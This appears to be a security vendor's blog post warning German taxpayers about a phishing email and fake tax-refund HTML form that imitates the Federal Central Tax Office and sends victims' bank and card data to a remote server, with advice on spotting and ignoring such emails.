Tax evasion? Don’t need that! Spam email promises tax refund!


Germans are well-known for accurate bureaucracy and tax payers have to file their income tax statement by the end of May. It is not surprising that attackers jump that opportunity now, as they do with several other special occasions during the year, such as the EURO 2012 or repeated holiday-related spam.

Tax payers are currently waiting for their tax office’s feedback and the fake email sent to users’ inboxes suggests being a legitimate feedback with a promised tax refund of almost €235. We’ve seen other mails with different refund values, but the scheme remains the same.

Screenshot of fake DCTO email tp phish user data

The outward appearance of this email is rather convincing, but the text is peppered with mistakes and most probably the result of an automatic translation.
The most interesting part is the html filScreenshot of the fake tax refund forme attached, with a design that is pretty similar to the design used on the "Bundeszentralamt für Steuern” (German Federal Central Tax Office) website:

Screenshot of the fake tax refund form

All information added in this form will be sent to a remote server:

The server used in this email, located in Belgium, still exists, but did currently not respond to any of our requests. During our analysis, we did not encounter any malware.

What can happen if someone enters all the requested data?

  • The attackers can use the bank data / credit card data to use it for carding fraud or simply do some online-shopping on the victim’s account.
  • They can use the data, which they know is valid, and sell it on the underground market.

What should you do and know?

  • Ignore those emails and throw them into the digital waste bin.
  • Feedback regarding taxes is issued by the local tax offices and not by the FCTO.
  • Remember: Official state authorities, such as the CTO, would never contact you with a simple email when requesting such important information.
  • Therefore, never disclose any personal information and/or bank data - either via email or on dubious websites.
  • Use an up-to-date, comprehensive security solution with a virus scanner, firewall, http scan and real-time protection. A spam filter, to get rid of unwanted spam in the first place, is a must-have, too.